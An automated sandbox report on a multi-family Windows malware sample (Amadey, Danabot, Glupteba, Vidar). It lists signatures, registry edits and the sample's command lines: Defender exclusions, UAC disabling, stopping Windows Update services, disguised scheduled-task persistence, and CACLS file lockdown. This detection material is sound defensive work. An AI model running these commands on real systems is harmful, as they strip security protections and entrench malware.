Malware Analysis Report

2025-01-02 09:11

Sample ID 231005-d8qlpsad54
Target 221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3
SHA256 221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3
Tags
amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan upx discovery persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3

Threat Level: Known bad

The file 221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3 was found to be: Known bad.

Malicious Activity Summary

amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan upx discovery persistence

UAC bypass

Danabot

Glupteba payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba

Detect Fabookie payload

Amadey

Vidar

Fabookie

Windows security bypass

Modifies boot configuration data using bcdedit

Stops running service(s)

Blocklisted process makes network request

Drops file in Drivers directory

Possible attempt to disable PatchGuard

Downloads MZ/PE file

Modifies Windows Firewall

UPX packed file

Windows security modification

Loads dropped DLL

Drops startup file

Executes dropped EXE

Reads user/profile data of web browsers

.NET Reactor proctector

Checks whether UAC is enabled

Accesses 2FA software files, possible credential harvesting

Adds Run key to start application

Enumerates connected drives

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Program crash

System policy modification

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Checks processor information in registry

Modifies system certificate store

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-05 03:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-05 03:40

Reported

2023-10-05 03:46

Platform

win7-20230831-en

Max time kernel

20s

Max time network

302s

Command Line

"C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe"

Signatures

Amadey

trojan amadey

Danabot

trojan banker danabot

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Vidar

stealer vidar

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HNXwBF1hWslJi8uXn3hEZDNL.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVhC6QKXjp86FwxFdU9kzyjO.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SEUjB2J9wSwNiMjokJDtWYV5.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sN0jqm02yfCiV6GzOoRNtToS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ojPHJWHZIjyrT0ueHRYvlxa8.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3A3zOMdIgnzUrG6F4oeXkHis.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zro8vMFJk8zSWliDKXwJG5Bi.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VXDtgdslF8HsYq7z546uKbP9.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F8kiFSfW5GvjyrhmHWJy8hkf.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nnb5hRbvjuyD097a85PnWOe2.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIvQbtjdgb7bzfXT78BbK3yA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2408 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1812 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe
PID 1812 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe
PID 1812 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe
PID 1812 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe
PID 1812 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe
PID 1812 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe
PID 1812 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe
PID 1812 wrote to memory of 2800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe
PID 1812 wrote to memory of 2800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe
PID 1812 wrote to memory of 2800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe
PID 1812 wrote to memory of 2800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe
PID 1812 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe
PID 1812 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe
PID 1812 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe
PID 1812 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe
PID 1812 wrote to memory of 320 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe
PID 1812 wrote to memory of 320 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe
PID 1812 wrote to memory of 320 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe
PID 1812 wrote to memory of 320 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe
PID 1812 wrote to memory of 2172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe
PID 1812 wrote to memory of 2172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe
PID 1812 wrote to memory of 2172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe
PID 1812 wrote to memory of 2172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 776 wrote to memory of 1508 N/A C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 776 wrote to memory of 1508 N/A C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 776 wrote to memory of 1508 N/A C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 776 wrote to memory of 1508 N/A C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe

"C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe

"C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe"

C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe

"C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe" --silent --allusers=0

C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe

"C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe"

C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe

"C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe"

C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe

"C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe"

C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe

"C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe"

C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe

"C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe"

C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe

"C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp" /SL5="$60162,491750,408064,C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\rVbSDBNUf2JPUOzwsmWVmhvc.exe

"C:\Users\Admin\Pictures\rVbSDBNUf2JPUOzwsmWVmhvc.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\Pictures\h15Hs6ewA8wDxuAPG7SwUvHx.exe

"C:\Users\Admin\Pictures\h15Hs6ewA8wDxuAPG7SwUvHx.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\is-R4Q61.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-R4Q61.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8259092891.exe"

C:\Users\Admin\AppData\Local\Temp\8259092891.exe

"C:\Users\Admin\AppData\Local\Temp\8259092891.exe"

C:\Windows\SysWOW64\cmd.exe

